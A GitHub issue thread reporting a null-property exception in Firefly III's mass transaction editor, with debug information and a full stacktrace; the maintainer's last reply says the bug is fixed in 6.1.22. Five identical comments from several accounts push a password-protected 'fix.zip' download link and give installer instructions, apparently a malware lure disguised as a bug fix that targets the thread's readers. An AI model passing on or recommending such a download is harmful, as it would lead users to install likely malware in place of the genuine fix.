### ISSUE TITLE
"Attempt to read property "type" on null" when mass editing transactions

### ISSUE THREAD

**Issue by Still34** [firefly-iii/firefly-iii#9175]
### Support guidelines

- [X] I've read the [support guidelines](https://github.com/firefly-iii/firefly-iii/blob/main/.github/support.md)

### I've found a bug and checked that ...

- [X] ... [the documentation](https://docs.firefly-iii.org/) does not mention anything about my problem
- [X] ... there are no open or closed issues that are related to my problem
- [X] ... it's [definitely a Firefly III issue, not me](https://github.com/firefly-iii/firefly-iii/blob/main/.github/its_you_not_me.md)

### Description

I was editing multiple transactions at once via `/transactions/mass/edit/`, and submitting the form led to this exception provided in stacktrace.

### Debug information

Debug information generated at 2024-08-26 15:22:09 for Firefly III version **v6.1.19**.

<table><thead><tr><th colspan="2">System information</th></tr><tr><th>Item</th><th>Value</th></tr></thead><tbody><tr><td>Firefly III</td><td>6.1.19 / v2.1.0 / 24 (exp. 24)</td></tr><tr><td>PHP version</td><td>8.3.9 (64bits) / apache2handler / Linux x86_64</td></tr><tr><td>BCscale</td><td>12</td></tr><tr><td>Error reporting</td><td>Display: Off, reporting: ALL errors</td></tr><tr><td>Max upload</td><td>67108864 (64 MB)</td></tr><tr><td>Database drivers</td><td><strong>*mysql*</strong>, pgsql, sqlite, </td></tr><tr><td>Docker build</td><td><span>#</span>1113, base <span>#</span>86</td></tr></tbody></table><table><thead><tr><th colspan="2">Firefly III information</th></tr><tr><th>Item</th><th>Value</th></tr></thead><tbody><tr><td>Timezone</td><td>Asia/Taipei + Asia/Taipei</td></tr><tr><td>App environment</td><td>production, debug: false</td></tr><tr><td>Layout</td><td>v1</td></tr><tr><td>Logging</td><td>notice, stack / (empty)</td></tr><tr><td>Cache driver</td><td>file</td></tr><tr><td>Default language and locale</td><td>en_US + equal</td></tr><tr><td>Trusted proxies</td><td>**</td></tr><tr><td>Login provider & user guard</td><td>eloquent / web</td></tr><tr><td>Login headers</td><td>N/A + N/A</td></tr><tr><td>Stateful domains</td><td></td></tr><tr><td>Last cron job</td><td>never (never)</td></tr><tr><td>Mailer</td><td>log</td></tr></tbody></table><table><thead><tr><th colspan="2">User-specific information</th></tr><tr><th>Item</th><th>Value</th></tr></thead><tbody><tr><td>User</td><td><span>#</span>1 of 1</td></tr><tr><td>User flags</td><td><span title="Has liabilities">:credit_card:</span> <span title="Has reconciled">:ledger:</span> <span title="Has rules">:wrench:</span> <span title="Has subscriptions">:email:</span></td></tr><tr><td>Session start</td><td>2024-07-27 00:00:00</td></tr><tr><td>Session end</td><td>2024-08-26 23:59:59</td></tr><tr><td>View range</td><td>1M</td></tr><tr><td>User language</td><td>en_US</td></tr><tr><td>User locale</td><td>en_US</td></tr><tr><td>Locale(s) supported</td><td>en_US.utf8: :white_check_mark:<br>en_US.UTF-8: :white_check_mark:<br></td></tr><tr><td>User agent</td><td>Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0</td></tr></tbody></table>

### Expected behaviour

Submission to be successful.

### Steps to reproduce

1. Select multiple transactions
2. Hit `Edit (n)`
3. Make edits
4. Submit

### Additional info

Stacktrace
```
app-1   | [2024-08-26 15:19:34] production.ERROR: Attempt to read property "type" on null {"userId":1,"exception":"[object] (ErrorException(code: 0): Attempt to read property \"type\" on null at /var/www/html/app/Validation/AccountValidator.php:89)
app-1   | [stacktrace]
app-1   | #0 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/HandleExceptions.php(256): Illuminate\\Foundation\\Bootstrap\\HandleExceptions->handleError()
app-1   | #1 /var/www/html/app/Validation/AccountValidator.php(89): Illuminate\\Foundation\\Bootstrap\\HandleExceptions->Illuminate\\Foundation\\Bootstrap\\{closure}()
app-1   | #2 /var/www/html/app/Validation/Account/ReconciliationValidation.php(79): FireflyIII\\Validation\\AccountValidator->setSource()
app-1   | #3 /var/www/html/app/Validation/AccountValidator.php(214): FireflyIII\\Validation\\AccountValidator->validateReconciliationSource()
app-1   | #4 /var/www/html/app/Services/Internal/Update/JournalUpdateService.php(198): FireflyIII\\Validation\\AccountValidator->validateSource()
app-1   | #5 /var/www/html/app/Services/Internal/Update/JournalUpdateService.php(173): FireflyIII\\Services\\Internal\\Update\\JournalUpdateService->hasValidSourceAccount()
app-1   | #6 /var/www/html/app/Services/Internal/Update/JournalUpdateService.php(137): FireflyIII\\Services\\Internal\\Update\\JournalUpdateService->hasValidAccounts()
app-1   | #7 /var/www/html/app/Http/Controllers/Transaction/MassController.php(217): FireflyIII\\Services\\Internal\\Update\\JournalUpdateService->update()
app-1   | #8 /var/www/html/app/Http/Controllers/Transaction/MassController.php(174): FireflyIII\\Http\\Controllers\\Transaction\\MassController->updateJournal()
app-1   | #9 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Controller.php(54): FireflyIII\\Http\\Controllers\\Transaction\\MassController->update()
app-1   | #10 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/ControllerDispatcher.php(43): Illuminate\\Routing\\Controller->callAction()
app-1   | #11 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Route.php(260): Illuminate\\Routing\\ControllerDispatcher->dispatch()
app-1   | #12 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Route.php(206): Illuminate\\Routing\\Route->runController()
app-1   | #13 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php(808): Illuminate\\Routing\\Route->run()
app-1   | #14 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(144): Illuminate\\Routing\\Router->Illuminate\\Routing\\{closure}()
app-1   | #15 /var/www/html/app/Http/Controllers/Transaction/MassController.php(65): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #16 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(165): FireflyIII\\Http\\Controllers\\Transaction\\MassController->FireflyIII\\Http\\Controllers\\Transaction\\{closure}()
app-1   | #17 /var/www/html/app/Http/Controllers/Controller.php(123): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #18 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(165): FireflyIII\\Http\\Controllers\\Controller->FireflyIII\\Http\\Controllers\\{closure}()
app-1   | #19 /var/www/html/app/Http/Middleware/InterestingMessage.php(71): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #20 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): FireflyIII\\Http\\Middleware\\InterestingMessage->handle()
app-1   | #21 /var/www/html/app/Http/Middleware/Binder.php(75): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #22 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): FireflyIII\\Http\\Middleware\\Binder->handle()
app-1   | #23 /var/www/html/app/Http/Middleware/Range.php(57): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #24 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): FireflyIII\\Http\\Middleware\\Range->handle()
app-1   | #25 /var/www/html/vendor/jc5/google2fa-laravel/src/Middleware.php(29): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #26 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): PragmaRX\\Google2FALaravel\\Middleware->handle()
app-1   | #27 /var/www/html/app/Http/Middleware/Authenticate.php(66): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #28 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): FireflyIII\\Http\\Middleware\\Authenticate->handle()
app-1   | #29 /var/www/html/vendor/laravel/passport/src/Http/Middleware/CreateFreshApiToken.php(63): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #30 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): Laravel\\Passport\\Http\\Middleware\\CreateFreshApiToken->handle()
app-1   | #31 /var/www/html/vendor/laravel/framework/src/Illuminate/Session/Middleware/AuthenticateSession.php(67): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #32 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): Illuminate\\Session\\Middleware\\AuthenticateSession->handle()
app-1   | #33 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/VerifyCsrfToken.php(88): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #34 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): Illuminate\\Foundation\\Http\\Middleware\\VerifyCsrfToken->handle()
app-1   | #35 /var/www/html/vendor/laravel/framework/src/Illuminate/View/Middleware/ShareErrorsFromSession.php(49): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #36 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): Illuminate\\View\\Middleware\\ShareErrorsFromSession->handle()
app-1   | #37 /var/www/html/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php(121): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #38 /var/www/html/vendor/laravel/framework/src/Illuminate/Session/Middleware/StartSession.php(64): Illuminate\\Session\\Middleware\\StartSession->handleStatefulRequest()
app-1   | #39 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): Illuminate\\Session\\Middleware\\StartSession->handle()
app-1   | #40 /var/www/html/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/AddQueuedCookiesToResponse.php(37): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #41 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): Illuminate\\Cookie\\Middleware\\AddQueuedCookiesToResponse->handle()
app-1   | #42 /var/www/html/vendor/laravel/framework/src/Illuminate/Cookie/Middleware/EncryptCookies.php(75): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #43 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): Illuminate\\Cookie\\Middleware\\EncryptCookies->handle()
app-1   | #44 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(119): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #45 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php(807): Illuminate\\Pipeline\\Pipeline->then()
app-1   | #46 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php(786): Illuminate\\Routing\\Router->runRouteWithinStack()
app-1   | #47 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php(750): Illuminate\\Routing\\Router->runRoute()
app-1   | #48 /var/www/html/vendor/laravel/framework/src/Illuminate/Routing/Router.php(739): Illuminate\\Routing\\Router->dispatchToRoute()
app-1   | #49 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(200): Illuminate\\Routing\\Router->dispatch()
app-1   | #50 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(144): Illuminate\\Foundation\\Http\\Kernel->Illuminate\\Foundation\\Http\\{closure}()
app-1   | #51 /var/www/html/app/Http/Middleware/InstallationId.php(47): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #52 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): FireflyIII\\Http\\Middleware\\InstallationId->handle()
app-1   | #53 /var/www/html/vendor/laravel/framework/src/Illuminate/Http/Middleware/TrustProxies.php(57): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #54 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): Illuminate\\Http\\Middleware\\TrustProxies->handle()
app-1   | #55 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php(21): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #56 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/ConvertEmptyStringsToNull.php(31): Illuminate\\Foundation\\Http\\Middleware\\TransformsRequest->handle()
app-1   | #57 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): Illuminate\\Foundation\\Http\\Middleware\\ConvertEmptyStringsToNull->handle()
app-1   | #58 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TransformsRequest.php(21): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #59 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/TrimStrings.php(51): Illuminate\\Foundation\\Http\\Middleware\\TransformsRequest->handle()
app-1   | #60 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): Illuminate\\Foundation\\Http\\Middleware\\TrimStrings->handle()
app-1   | #61 /var/www/html/vendor/laravel/framework/src/Illuminate/Http/Middleware/ValidatePostSize.php(27): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #62 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): Illuminate\\Http\\Middleware\\ValidatePostSize->handle()
app-1   | #63 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Middleware/PreventRequestsDuringMaintenance.php(110): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #64 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): Illuminate\\Foundation\\Http\\Middleware\\PreventRequestsDuringMaintenance->handle()
app-1   | #65 /var/www/html/app/Http/Middleware/SecureHeaders.php(52): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #66 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(183): FireflyIII\\Http\\Middleware\\SecureHeaders->handle()
app-1   | #67 /var/www/html/vendor/laravel/framework/src/Illuminate/Pipeline/Pipeline.php(119): Illuminate\\Pipeline\\Pipeline->Illuminate\\Pipeline\\{closure}()
app-1   | #68 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(175): Illuminate\\Pipeline\\Pipeline->then()
app-1   | #69 /var/www/html/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php(144): Illuminate\\Foundation\\Http\\Kernel->sendRequestThroughRouter()
app-1   | #70 /var/www/html/public/index.php(73): Illuminate\\Foundation\\Http\\Kernel->handle()
app-1   | #71 {main}
app-1   | "}
```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by JC5** [comment]
This will be fixed in 6.1.22
